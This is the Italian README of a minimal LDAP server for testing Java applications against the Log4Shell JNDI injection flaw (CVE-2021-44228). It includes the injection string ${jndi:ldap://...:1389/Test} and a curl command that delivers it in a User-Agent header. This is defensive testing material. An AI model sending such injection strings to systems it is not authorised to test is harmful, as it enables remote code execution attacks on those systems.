
Un server LDAP minimalista pensato per testare la vulnerabilità agli attacchi di injection JNDI+LDAP in Java, in particolare CVE-2021-44228.
Questo è un server LDAP minimalista pensato per testare la vulnerabilità agli attacchi di injection JNDI+LDAP in Java, in particolare CVE-2021-44228.
Scarica il binario del server di test per la tua piattaforma (puoi trovare tutti i binari in Releases).
Esegui il server di test su un indirizzo IP accessibile dall'applicazione che vuoi testare. È più semplice se puoi eseguire il server sullo stesso host della tua app (localhost).
Trova qualsiasi input esterno non attendibile che la tua applicazione riceve dall'esterno e registra nei log.
Fai in modo che la tua app registri una stringa che include:
${jndi:ldap://localhost:1389/Test}
Sostituisci localhost con l'IP o il dominio del tuo server se non stai eseguendo il server di test in locale.
Ad esempio, se stai eseguendo un server HTTP che registra l'header HTTP User-Agent, puoi testare la vulnerabilità chiamando questo comando cURL mentre il server di test è in esecuzione:
curl my-host -H 'User-Agent: ${jndi:ldap://test-server-host:1389/Test}'
Se la tua applicazione è vulnerabile, dovresti vedere una connessione in entrata sul server di test e la stringa iniettata verrà sostituita dal testo !!! VULNERABLE !!! nei tuoi log. Se la tua applicazione non è vulnerabile, la stringa iniettata non dovrebbe essere sostituita e il server di test non dovrebbe ricevere alcuna connessione.